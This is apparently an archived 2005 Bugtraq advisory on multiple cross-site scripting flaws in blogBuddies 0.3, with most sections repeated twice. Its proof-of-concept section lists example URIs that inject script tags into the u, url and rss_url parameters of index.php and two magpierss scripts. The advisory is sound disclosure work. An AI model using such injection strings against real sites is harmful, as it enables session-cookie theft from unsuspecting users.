BlogBuddies Multiple Cross-Site Scripting Vulnerabilities
BID:15555
Info
BlogBuddies Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 15555 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 24 2005 12:00AM |
| Updated: | Nov 24 2005 12:00AM |
| Credit: | [email protected] is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
blogBuddies blogBuddies 0.3 |
| Not Vulnerable: | |
Discussion
BlogBuddies Multiple Cross-Site Scripting Vulnerabilities
blogBuddies is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
blogBuddies is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
BlogBuddies Multiple Cross-Site Scripting Vulnerabilities
No exploit is required.
Example URI have been provided:
http://www.example.com/computechnix/blogbuddies/
index.php?u="><script>alert("hola vengo a flotar");</script>
http://www.example.com/computechnix/blogbuddies/magpierss-0.71/scripts/
magpie_debug.php?url="><script>alert("...");</script>
http://www.example.com/computechnix/blogbuddies/magpierss-0.71/scripts/
magpie_slashbox.php?rss_url="><script>alert("...");</script>
No exploit is required.
Example URI have been provided:
http://www.example.com/computechnix/blogbuddies/
index.php?u="><script>alert("hola vengo a flotar");</script>
http://www.example.com/computechnix/blogbuddies/magpierss-0.71/scripts/
magpie_debug.php?url="><script>alert("...");</script>
http://www.example.com/computechnix/blogbuddies/magpierss-0.71/scripts/
magpie_slashbox.php?rss_url="><script>alert("...");</script>
Solution / Fix
BlogBuddies Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
BlogBuddies Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- blogBuddies Web Site (blogBuddies)